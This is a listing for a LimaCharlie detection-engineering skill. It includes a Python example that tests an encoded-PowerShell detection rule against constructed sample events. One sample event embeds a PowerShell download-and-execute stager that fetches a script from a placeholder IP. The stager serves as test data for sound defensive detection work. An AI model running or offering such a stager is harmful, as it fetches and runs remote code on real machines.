detection-engineering
Official
AI-assisted D&R rule design and testing.
System Documentation
What problem does it solve?
This Skill acts as an expert Detection Engineer that helps you create, test, and deploy D&R (Detection & Response) rules in LimaCharlie. It guides you through understanding the threat, researching the available data (event schema, LCQL queries, timeline), generating the detection logic, testing the rule against sample events and historical data, and deploying only rules that have passed validation. Use it when building detections, writing D&R rules, testing detection logic, or whenever you want to detect a specific behavior or threat.
Core Features & Use Cases
- AI-generated detection rules and response logic for LimaCharlie
- Guided research of event schemas, LCQL queries, and timeline data
- Iterative testing against sample events and historical data, with explicit validation steps
- Deployment gated on user approval, with the validated rule documented
Quick Start
Example prompt: Generate a detector for encoded PowerShell seen in the last 24h, test it against sample events, then deploy it.
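What the "test against sample events" step looks like in practice, as an added example (not code from the Skill or from LimaCharlie). The rule below mirrors the D&R YAML layout (a `detect` block of `op`/`path`/`value` nodes, `and`/`or` nodes holding a `rules` list, and a `respond` list), written as a Python dict so the file runs offline. `evaluate` is an assumed, minimal local stand-in for the platform's matching engine that supports only the operators this rule uses; the sample events are constructed, not real telemetry. Treat it as a pre-flight check on the logic and still validate the rule in LimaCharlie before deploying it.

```python
"""Encoded-PowerShell D&R rule exercised against constructed sample events.

Added example, not code from the Skill or from LimaCharlie. `evaluate` is a
local stand-in for the platform's rule engine (assumption: same semantics for
the few operators used here); validate on the platform before deployment.
"""
from __future__ import annotations
import base64
import re

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob; tune the
# minimum length (20) to your environment. Group 3 is the blob itself.
ENCODED_B64 = r"(^|\s)-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/]{20,}={0,2})(\s|$)"

RULE = {
    "detect": {
        "event": "NEW_PROCESS",
        "op": "and",
        "rules": [
            {   # Windows PowerShell 5.x or PowerShell 7 (pwsh) image name
                "op": "or",
                "rules": [
                    {"op": "ends with", "path": "event/FILE_PATH",
                     "value": "powershell.exe", "case sensitive": False},
                    {"op": "ends with", "path": "event/FILE_PATH",
                     "value": "pwsh.exe", "case sensitive": False},
                ],
            },
            {"op": "matches", "path": "event/COMMAND_LINE",
             "re": ENCODED_B64, "case sensitive": False},
        ],
    },
    "respond": [{"action": "report", "name": "encoded-powershell"}],
}


def _lookup(event: dict, path: str):
    """Resolve a slash path such as event/COMMAND_LINE against the envelope."""
    node = event
    for part in path.split("/"):
        if not isinstance(node, dict):
            return None
        node = node.get(part)
    return node


def evaluate(node: dict, event: dict) -> bool:
    """Local evaluator for the subset of D&R operators used by RULE."""
    op = node["op"]
    if op in ("and", "or"):
        results = [evaluate(child, event) for child in node["rules"]]
        return all(results) if op == "and" else any(results)
    value = _lookup(event, node["path"])
    if value is None:
        return False
    value = str(value)
    insensitive = not node.get("case sensitive", True)
    if op == "ends with":
        expect = node["value"]
        if insensitive:
            value, expect = value.lower(), expect.lower()
        return value.endswith(expect)
    if op == "matches":
        flags = re.IGNORECASE if insensitive else 0
        return re.search(node["re"], value, flags) is not None
    raise ValueError(f"operator not supported by this local evaluator: {op}")


def decode_encoded_command(command_line: str) -> str | None:
    """Recover the script: -EncodedCommand carries base64 of UTF-16LE text."""
    m = re.search(ENCODED_B64, command_line, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(3), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(script: str) -> str:
    """Build the argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def run_rule(rule: dict, events: list[dict]) -> list[dict]:
    """Return the report payloads the rule would emit for matching events."""
    reports = []
    for ev in events:
        if ev["routing"]["event_type"] != rule["detect"]["event"]:
            continue
        if evaluate(rule["detect"], ev):
            reports.append({"name": rule["respond"][0]["name"],
                            "hostname": ev["routing"]["hostname"],
                            "decoded": decode_encoded_command(ev["event"]["COMMAND_LINE"])})
    return reports


# Constructed sample events (not real telemetry); only the fields RULE reads.
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/s.ps1')"
SAMPLE_EVENTS = [
    {"routing": {"event_type": "NEW_PROCESS", "hostname": "ws01"},   # true positive
     "event": {"FILE_PATH": PS_PATH,
               "COMMAND_LINE": "powershell.exe -NoP -W Hidden -enc " + encode_command(STAGER)}},
    {"routing": {"event_type": "NEW_PROCESS", "hostname": "ws02"},   # -E... but not -enc
     "event": {"FILE_PATH": PS_PATH,
               "COMMAND_LINE": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"}},
    {"routing": {"event_type": "NEW_PROCESS", "hostname": "ws03"},   # wrong image
     "event": {"FILE_PATH": r"C:\Windows\System32\cmd.exe", "COMMAND_LINE": "cmd.exe /c whoami"}},
    {"routing": {"event_type": "NEW_PROCESS", "hostname": "ws04"},   # case variance, pwsh
     "event": {"FILE_PATH": r"C:\Program Files\PowerShell\7\PWSH.EXE",
               "COMMAND_LINE": "PWSH.EXE -EncodedCommand " + encode_command("whoami /all")}},
    {"routing": {"event_type": "CODE_IDENTITY", "hostname": "ws05"},  # other event type
     "event": {"FILE_PATH": PS_PATH, "COMMAND_LINE": "-enc " + encode_command(STAGER)}},
]

if __name__ == "__main__":
    for r in run_rule(RULE, SAMPLE_EVENTS):
        print(r["hostname"], r["name"], repr(r["decoded"]))
```

Running the file reports ws01 and ws04 with the decoded scripts, and nothing for the `-ExecutionPolicy` false-positive candidate, the non-PowerShell process, or the non-`NEW_PROCESS` event. The point of the sample set is that it pins the rule's behaviour on near-misses (case variance, the pwsh image, a `-E...` switch that is not `-enc`) before the rule ever touches historical data; the platform's own replay against real events remains the final test.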
Dependency Matrix
Required Modules
None required
Components
Standard package
Claude Code Installation
Recommended: Let Claude install automatically. Simply copy and paste the text below to Claude Code.
Please help me install this Skill: Name: detection-engineering Download link: https://github.com/refractionPOINT/lc-ai/archive/main.zip#detection-engineering Please download this .zip file, extract it, and install it in the .claude/skills/ directory.